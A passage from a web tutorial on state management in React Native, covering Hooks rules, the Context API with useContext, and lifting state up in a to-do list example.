) and our decrement function becomes setCounter(counter - 1). React has many built-in Hooks, like useState, useEffect, useContext, useReducer, useCallback, useMemo, useRef, useImperativeHandle, useLayoutEffect and useDebugValue — which you can find more info about in the React Hooks docs. Additionally, we can build our own Custom Hooks. There are two rules to follow when building or using Hooks:and useEffectcalls. Only Call Hooks from React Functions. Don’t call Hooks from regular JavaScript functions. Instead, you can either call Hooks from React functional components or call Hooks from custom Hooks. By following this rule, you ensure that all stateful logic in a component is clearly visible from its source code. Hooks are really simple to understand, and they’re helpful when adding state to a functional component. The Context API Context provides a way to pass data through the component tree without having to pass props down manually at every level. In a typical React Native application, data is passed top-down via props. If there are multiple levels of components in the React application, and the last child in the component tree wants to retrieve data from the top-most parent, then you’d have to pass props down individually. Consider an example below. We want to pass the value of theme from the App component to the Pic component. Typically, without using Context, we’ll pass it through every intermediate level as follows: const App = () => ( <> <Home theme="dark" /> <Settings /> </> ) const Home = () => ( <> <Profile /> <Timeline /> </> ) const Profile = () => ( <> <Pic theme={theme} /> <ChangePassword /> </> ) The value of theme goes from App -> Profile -> Pic. The above problem is known as prop-drilling. This is a trivial example, but consider a real-world application where there are tens of different levels. It becomes hard to pass data through every child just so it can be used in the last child. Therefore, we have Context. Context allows us to directly pass data from App -> Pic. Here’s how to do it using the Context API: import React from 'react' const ThemeContext = React.createContext("light") // set light as default const App = () => ( <ThemeContext.Provider <Home /> <Settings /> </ThemeContext.Provider> ) const Home = () => ( <> <Profile /> <Timeline /> </> ) const Profile = () => ( <ThemeContext.Consumer> {theme => ( <Pic theme={theme} /> <ChangePassword /> )} </ThemeContext.Consumer> ) Firstly, we create ThemeContext using the React.createContext API. We set light as the default value. Then we wrap our App component’s root element with ThemeContext.Provider, while providing theme as a prop. Lastly, we use ThemeContext.Consumer as a render prop to get the theme value as dark. The render prop pattern is nice, but if we have multiple contexts then it might result in callback hell. To save ourselves from callback hell, we can use Hooks instead of ThemeContext.Consumer. The only thing we need to change is the Profile component’s implementation detail: const Profile = () => { const theme = React.useContext(ThemeContext) return (<> <Pic theme={theme} /> <ChangePassword /> </> ) } This way, we don’t have to worry about callback hell. Sharing State across Components Until now, we only managed state in the component itself. Now we’ll look at how to manage state across components. Suppose we’re creating a simple to-do list app as follows: import { View, Text } from 'react-native' const App = () => ( <> <AddTodo /> <TodoList /> </> ) const TodoList = ({ todos }) => ( <View> {todos.map(todo => ( <Text> {todo} </Text>) )} </View> ) Now, if we want to add a to-do from the AddTodo component, how will it show up in the TodoList component’s todos prop? The answer is “lifting state up”. If two sibling components want to share state, then the state must be lifted up to the parent component. The completed example should look like this: import { View, Text, TextInput, Button } from 'react-native' const App = () => { const [ todos, setTodos ] = React.useState([]) return ( <> <AddTodo addTodo={todo => setTodos([...todos, todo])} /> <TodoList todos={todos} /> </> ) } const AddTodo = ({ addTodo }) => { const [ todo, setTodo ] = React.useState('') return ( <> <TextInput value={todo} onChangeText={value => setTodo(value)} /> <Button title="Add Todo" onPress={() => { addTodo(todo) setTodo('') }} /> </> ) } const TodoList = ({ todos }) => ( <View> {todos.map(todo => ( <Text> {todo} </Text>) )} </View> ) Here, we keep the state in the App component. We use the React Hook useState to store todos as an empty array. We then pass the addTodo method to the AddTodo component and the todos array to the TodoList component. The AddTodo component takes in the addTodo method as a prop. This method should be called once the button is pressed. We also have an TextInput element which also uses the React Hook useState to keep track of the changing value of TextInput. Once the Button is pressed, we call the addTodo method, which is passed from the parent App. This makes sure the todo is added to the list of todos. And later we empty the TextInput box. The TodoList component takes in todos and renders a list of todo items given to it. You can also try deleting a to-do to practice lifting state up yourself. Here’s the solution: const App = () => { const [ todos, setTodos ] = React.useState([]) return ( <> <AddTodo addTodo={todo => setTodos([...todos, todo])} /> <TodoList todos={todos} deleteTodo={todo => setTodos(todos.filter(t => t !== todo))} /> </> ) } const TodoList = ({ todos, deleteTodo }) => ( <View> {todos.map(todo => ( <Text> {todo} <Button title="x" onPress={() => deleteTodo(todo)} /> </Text>) )} </View> ) This is the most common practice in React. Lifting states up is not as simple as it seems. This is an easy example, but in a real-world application we don’t know which state will be needed to lift up to its parent to be used in a sibling component. So at first, keep state in the component itself, and when a situation arises to have to share state between components then only lift state up to the parent. This way you don’t make your parent component a big state object. Conclusion To sum up, we looked at what state is and how to set the value of state using the setState() API provided by React. We also looked at React Hooks, which make it easy to add state to a functional component without having to convert it to a class component. We learned about the new Context API and its Hooks version useContext, which helps us to stay away from render prop callback hell. Finally, we learned about lifting state up to share state between sibling components. React becomes very simple once you understand these core concepts. Remember to keep state as local to the component as possible. Use the Context API only when prop drilling becomes a problem. Lift state up only when you need to. Finally, check out state management libraries like Redux and MobX once your application gets complex and it’s hard to debug state changes.
https://www.sitepoint.com/state-management-in-react-native/?utm_source=rss
CC-MAIN-2019-39
refinedweb
2,093
66.54
Monad comprehensions Monad comprehensions were added to the main GHC repository on the 4th May 2011. See ticket #4370. Translation rules Variables : x and y Expressions : e, f and g Patterns : w Qualifiers : p, q and r The main translation rule for monad comprehensions. [ e | q ] = [| q |] >>= (return . (\q_v -> e)) (.)_v rules. Note that _v is a postfix rule application. (w <- e)_v = w (let w = d)_v = w (g)_v = () (p , q)_v = (p_v,q_v) (p | v)_v = (p_v,q_v) (q, then f)_v = q_v (q, then f by e)_v = q_v (q, then group by e using f)_v = q_v (q, then group using f)_v = q_v [|.|] rules. [| w <- e |] = e [| let w = d |] = return d [| g |] = guard g [| p, q |] = ([| p |] >>= (return . (\p_v -> [| q |] >>= (return . (\q_v -> (p_v,q_v)))))) >>= id [| p | q |] = mzip [| p |] [| q |] [| q, then f |] = f [| q |] [| q, then f by e |] = f (\q_v -> e) [| q |] [| q, then group by e using f |] = (f (\q_v -> e) [| q |]) >>= (return . (unzip q_v)) [| q, then group using f |] = (f [| q |]) >>= (return . (unzip q_v)) unzip (.) rules. Note that unzip is a desugaring rule (i.e., not a function to be included in the generated code). unzip () = id unzip x = id unzip (w1,w2) = \e -> ((unzip w1) (e >>= (return .(\(x,y) -> x))), (unzip w2) (e >>= (return . (\(x,y) -> y)))) Examples Some translation examples using the do notation to avoid things like pattern matching failures are: [ x+y | x <- Just 1, y <- Just 2 ] -- translates to: do x <- Just 1 y <- Just 2 return (x+y) Transform statements: [ x | x <- [1..], then take 10 ] -- translates to: take 10 (do x <- [1..] return x) Grouping statements (note the change of types): [ (x :: [Int]) | x <- [1,2,1,2], then group by x ] :: [[Int]] -- translates to: do x <- mgroupWith (\x -> x) [1,2,1,2] return x Parallel statements: [ x+y | x <- [1,2,3] | y <- [4,5,6] ] -- translates to: do (x,y) <- mzip [1,2,3] [4,5,6] return (x+y) Note that the actual implementation is not using the do-Notation, it's only used here to give a basic overview about how the translation works. Implementation details Monad comprehensions had to change the StmtLR data type in the hsSyn/HsExpr.lhs file in order to be able to lookup and store all functions required to desugare monad comprehensions correctly (e.g. return, (>>=), guard etc). Renaming is done in rename/RnExpr.lhs and typechecking in typecheck/TcMatches.lhs. The main desugaring is done in deSugar/DsListComp.lhs. If you want to start hacking on monad comprehensions I'd look at those files first. Some things you might want to be aware of: [todo]
https://ghc.haskell.org/trac/ghc/wiki/MonadComprehensions?version=7
CC-MAIN-2015-18
refinedweb
444
72.87
I'm trying to set a defaultProp with an object literal, but after some time I realized that the React class constructor is not merging the default props with the applied props, so I end up with undefined values for any properties in the defaultProps literal that haven't been included in the applied props. Is there a way to merge default props and applied props, or do I need to break up my object into several props? class Test extends React.Component { constructor(props) { super(props); //props.test is only {one: false} //props.test.two is undefined } render() { return (<div>render</div>) } } Test.defaultProps = { test: { one: true, two: true } } ReactDOM.render(<Test test={{'one': false}}/>, document.getElementById('#test')); React only does a shallow merge of the default props and the actual props, i.e. nested default props are overridden instead of merged. This is by design. See this React issue for more background and reasoning why this is the case and potential workarounds: aside from the potential perf issues here. one issue with this is how do you handle nested complex structures like arrays? concatenation? Union? what about an array of objects? deep object merging can lead to unexpected behaviour, which is why often implementations allow you to specify a merge strategy such as _. merge. I'm not sure how you would do that in prop type declaration.
https://codedump.io/share/nYwGQJjFYxOW/1/reactcomponentdefaultprops-objects-are-overridden-not-merged
CC-MAIN-2017-04
refinedweb
230
57.98
_lwp_cond_reltimedwait(2) - unmount a file system #include <sys/mount.h> int umount(const char *file); int umount2(const char *file, int mflag); The umount() function requests that a previously mounted file system contained on a block special device or directory be unmounted. The file argument is a pointer to the absolute pathname of the file system to be unmounted. After unmounting the file system, the directory upon which the file system was mounted reverts to its ordinary interpretation. The umount2() function is identical to umount(), with the additional capability of unmounting file systems even if there are open files active. The mflag argument must contain one of the following values: Perform a normal unmount that is equivalent to umount(). The umount2() function returns EBUSY if there are open files active within the file system to be unmounted. Unmount the file system, even if there are open files active. A forced unmount can result in loss of data, so it should be used only when a regular unmount is unsuccessful. The umount2() function returns ENOTSUP if the specified file systems does not support MS_FORCE. Only file systems of type nfs, ufs, pcfs, and zfs support MS_FORCE. Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error. The umount() and umount2() functions.: The file pointed to by file does not support this operation. The umount() and umount2() functions can be invoked only by a process that has the {PRIV_SYS_MOUNT} privilege asserted in its effective set. Because it provides greater functionality, the umount2() function is preferred.
http://docs.oracle.com/cd/E26502_01/html/E29032/umount-2.html
CC-MAIN-2016-07
refinedweb
261
56.15
trying to create windows Hi, I am currently trying to create and open a window in a Max external. The externals I had written for Max 4.6 used lots of windows, and I want to re-write them for Max 5. There are other colleagues who had already complained about the fact the t_wind is no longer available im Max 5. Now I am trying to use functions of the Carbon Window Manager to create and open a window. First, I added Carbon.frameworks to the project (I am actually using the "minimum" project of the examples) and added #include #include "MacWindows.h" at the top of the minimum.c file (just below #include "ext.h"). In the minimum structure I declared a Window Reference: WindowRef *myWindow; and I added a function to create the window: void CreateWindows (t_minimum *x) { OSStatus err; Rect bounds; bounds.top = 50; bounds.left = 50; bounds.right = 550; bounds.bottom = 550; err = CreateNewWindow (1, 0, &bounds, x->myWindow); if (err) { post ("can’t create window"); } else { post ("new window created"); } } I called this function from the *minimum_new function. In this function, the Window Manager Function "CreateNewWindow" should create the new window (the 1st parameter is the window class, the 2nd the window attributes, the 3rd the content bounds and the 4th the actual WindowRef). I pass the WindowRef x->myWindow from the minimum structure. I used err to indicate whether the window could be created or not. When I compile the project and open the external in Max5, the creation of the window fails ("can’t create window"). The strange thing is that I can create a window (and even open it) when I declare a local Window Ref inside this function: void CreateWindows (t_minimum *x) { OSStatus err; Rect bounds; WindowRef *myWindow; bounds.top = 50; bounds.left = 50; bounds.right = 550; bounds.bottom = 550; err = CreateNewWindow (1, 0, &bounds, myWindow); if (err) { post ("can’t create window"); } else { post ("new window created"); } ShowWindow (*myWindow); } In this case, the external will create and open the window. Of course it doesn’t make sense like this, since this WindowRef is local and there is no way to access this window any more after it has been created and opened. Why can’t this function create the window when I pass it the WindowRef from the minimum structure (x->myWindow), and why will it create a window when I declare the WindowRef inside this function? I also tried to declare a global WindowRef at the top of the minimum.c file (which is no member of the minimum structure), but CreateNewWindow won’t create the window. Has anybody got an idea why this is the case? Have you tried using kDocumentWindowClass for the first argument to CreateNewWindow()? That works for me. Also, I’ve never had any problems storing WindowRef pointers anywhere. Davis thanks Davis, I have just tried it – unfortunately with the same (negative) result. It really shouldn’t matter where I store the Window Ref! Hm…… any idea? I attach the simlewindow.c file. Maybe someone can try it and tell me why it doesen’t work I tried simplewindow.c with Max5 SDK, Mac OS 10.4.11, and Xcode 2.5. I commented out: #include "MacWindows.h" That file gets included automatically when I add Carbon.framework to the project. I noticed that your t_simplewindow struct did not contain a WindowRef, but a pointer to one. You need an actual WindowRef and you pass the address of it to CreateNewWindow(). ShowWindow() is called upon successful window creation. Oh, and I added some window attributes. For info on installing event handlers, try: Anyways, I attached an altered version of simplwindow.c. I hope that gets you up an running. Davis Hi Davis, thanks a lot!!! It works now. That’s great! I may come up with further questions some time later. Rainer Hi Davis, thanks again for your help. I have started to study the Carbon Event Manager to include events to my external (I still work with the simplewindow object to study basic things). I have defined Event Handlers for mouse and keyboard events and registered them with the window. Unfornutately these handlers seem to overwrite the standard event handler which had been installed with the window attributes in the function CreateNewWindow (…). So now I can’t drag the window with the mouse anymore. I thought that specifyng event handlers will only overwrite the events for which the handler is isntalled (in this case: the mouse down, mouse up and mouse dragged events) and leave the other events to be processed by the standard event handler. How could I fix this? I enclose the simplewindow.c file again. Thanks, Rainer Your event handlers should return eventNotHandledErr if you want the default handlers to operate on the event. If you return anything other than eventNotHandledErr (like noErr), then event handling will stop for that event. I just changed all the lines in your code that look like this: return err; to: return eventNotHandledErr; That way, whenever you return from a handler, the default window handlers get to operate on the event. I see some colorful squares and triangles and I am able to move/minimize/close the window. You should definitely prevent any window operations after the window is closed/destroyed. Or just don’t allow the user to destroy the window; instead let them hide/un-hide the window. Good luck Davis Hi Davis, thanks very much for your kind help!!! Rainer It would be useful to know how to do this via Juce/Cycling’s API, for cross platform stuff and since carbon is being deprecated soon. I hope it can be included in the API docs. oli I thought that huge chunks of Carbon were being deprecated; not Carbon as a whole. Though, I wouldn’t mind if Apple killed Carbon as long as they provided us with a replacement that didn’t require Objective-C. As for cross-platform development, I’m thinking about trying wxWidgets or Juce. But, if what you’re trying to do isn’t directly related to the SDK, then the Cycling devs will most likely ignore your requests for help. Forums > Dev
https://cycling74.com/forums/topic/trying-to-create-windows/
CC-MAIN-2016-30
refinedweb
1,037
66.03
RECOMMENDED: If you have Windows errors then we strongly recommend that you download and run this (Windows) Repair Tool. Dec 15, 2011. BufferedReader in = new BufferedReader(new InputStreamReader(System.in)); System.out.println("What is your name?"); String name = in. Bogged down with errors? This series presents the 50 most common compiler errors and runtime exceptions that Java devs face—and how to conquer them. Java: Identifier expected. { System.out.println("This is a test."); }. "Identifier expected" error when adding elements of ArrayList into Array. 1. why do i get a identifier expected. what. 0; total = 0; } else { System.out.println. my target value from my Array List it says Error: <identifier> expected. Db Upgrade Failed Error Executing An Sql Statement When the BlackBerry® Enterprise Server is installed or updated, the following error message appears: DB Upgrade Failed. Error Executing SQL statement. Please see the. Dec 19, 2016. Hi I am currently on Trim 7.34 and receive the following message: "connection to trim dataset [dbname] failed: Error executing a SQL statement. The following tables list predefined null) { System.out.println. expected to succeed. But note that in general if an integrity check fails it signifies that the message was changed in transit. If the unwrap method encounters an integrity check failure, it throws a GSSException. java – compilation error: identifier expected – Stack Overflow –. (System.in)); System.out.println("What is your name?");. Compilation error <identifier> expected. 0. Compiler error: <identifier> expected. How do I resolve. BasicDBObject json = new BasicDBObject (); json.append ("author", "Smith"); json.append ("title", "My first book"); System.out.println ("Inserting. a duplicate identifier or an identifier with a different data type than expected for. Output via System.out.println() and System.out.print() You can use System.out.println() (print-line) or System.out.print() to print message to. I have been troubleshooting this program for hours, trying several configurations, and have had no luck. It has been written in java, and has 33 errors (lowered from. (if you didn’t type anything where a JvmType is expected and you ask for content assist you. void main(String args[]) { «FOR javaType : greeting.javaTypes» System.out.println("Hello «greeting.name» from " +. Looks like you forgot to add semi-colons to the end of some of your statements: System.out.println("Please enter your first name"); System.out.println("Please enter. but this is the main class where I’m getting and identifier expected error. This is my code: import java.util.Scanner; public class Player { private boolean isHuman; private int score=0; private Scanner input; public Player(int human) {. Oct 14, 2013. System.out.println("la.la.la."); } Person p = new Person(); p.sing(); } What does the error mean? What identifier needs to be present on that line. I'm sorry for the extremely short question, but i don't even know why i have this error: Syntax error on token "println", = expected after this token In this code. I have two other classes but they are very small, and this is where the error lies. Player.java:32: illegal start of expression System.out.println("You threw a " + throw); ^./Player.java:32: ‘;’ expected System.out.println("You. Read / Parse CSV file in Java using opencsv library Apr 26, 2012. You can't use a method while declaring the attributes/methods for a class. public class ReadStateFile { Scanner kb = new Scanner(System.in);. RECOMMENDED: Click here to fix Windows errors and improve system performance
http://geotecx.com/error-identifier-expected-system-out-println/
CC-MAIN-2018-05
refinedweb
576
54.39
I'm extracting information from a SQL Server database using Dapper. The POCO for the information in question is below. public class Client { public string ShortName { get; set; } public string ContactDetail { get; set; } public string Street { get; set; } public string District { get; set; } public string Town { get; set; } public string County { get; set; } public string Postcode { get; set; } } When I extract the information for the above object using the query below all the information is mapped correctly, apart from the following line max(case when cd.Type = 1 OR cd.Type = 2 then cd.Detail end) as 'ContactDetail' I believe this may be because I am not simply extracting the data from a table column and I am instead doing some processing using the CASE clause beforehand and therefore Dapper cannot find the correct place to map the information onto. I thought including the AS clause would help Dapper to find the correct mapping but this didn't actually work. How can I change my query so that Dapper can map the ContactDetail data correctly? select tp.ShortName as 'ShortName', max(case when cd.Type = 1 OR cd.Type = 2 then cd.Detail end) as 'ContactDetail', tp.Street, tp.District, tp.Town, tp.County, tp.PostCode ... (rest of query snipped as unneeded) I know the query works correctly as I can run it in SSMS and it returns the correct information. Dapper doesn't have any interest or knowledge of what is inside the query - it only cares about the shape of the results. So: whatever is happening - it is part of the query. My hunches would be: null nullhandling and null-coalescing, perhaps with the maxcomplicating things Note that you can't just compare to SSMS output, because SSMS and ADO.NET ( SqlClient) can have different SET option defaults, which can make significant yet subtle differences to some queries. To investigate it properly, I'd really need a reproducible example (presumably with fake data); without that, we're kinda guessing. To reiterate, though: I strongly suspect that if you execute the same query via ExecuteReader or similar, you'll find that the value coming back in that position is indeed null (or DBNull). I'm pretty sure the issue is that if you're using the object mapper in Dapper (i.e. Client in <>) then it will simply look for those columns in the matching table. The "ContactDetail" does not exist (it's derived), so it will not find it. You have a couple of options here, depending on your data and use case. Get the raw data from Dapper, and then use Linq (or similar) to derive the ContactDetail using logic within the program. Write a stored procedure based on your query, and use Dapper to run it Use Dapper's Query command to run your SQL statement, instead of trying to directly map the object. Let me know if you get stuck on this, or require further explanation.
https://dapper-tutorial.net/knowledge-base/53396970/dapper-can-t-find-poco-mapping-from-select-case-query
CC-MAIN-2021-21
refinedweb
491
61.87
Subject: Re: [boost] [1.48.0.beta 1][interprocess] detail namespace From: Jan Boehme (jan.boehme_at_[hidden]) Date: 2011-10-28 07:27:22 On 10/28/2011 12:12 PM, Vicente J. Botet Escriba wrote: > Le 28/10/11 11:12, Jan Boehme a écrit : >> Hi, >> >> is the change of the name of the namespace 'detail' to 'ipcdetail' >> intended to be in the release? Isn't it over-qualified as it is located >> in the the namespace 'boost::interproces' anyway?. Btw it breaks our >> code and should mentioned in the release notes of the library. >> > I guess that the detail namespace was not documented in the previous > release. In this case the author has the freedom of changing any > implementation detail. IMO, Ion has a good reason to do it. I'd bet. > > How your code is broken? It's nothing dramatic. It's caused by the new name of this namespace and the usage of some members of it in an extension. I wanted to have it confirmed to make sure our adaptions can remain after an official 1.48 release. Our code must support various Boost version so we solved it using the pre-processor. > Best, > Vicente Cheers, Jan. Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2011/10/187323.php
CC-MAIN-2020-45
refinedweb
224
78.04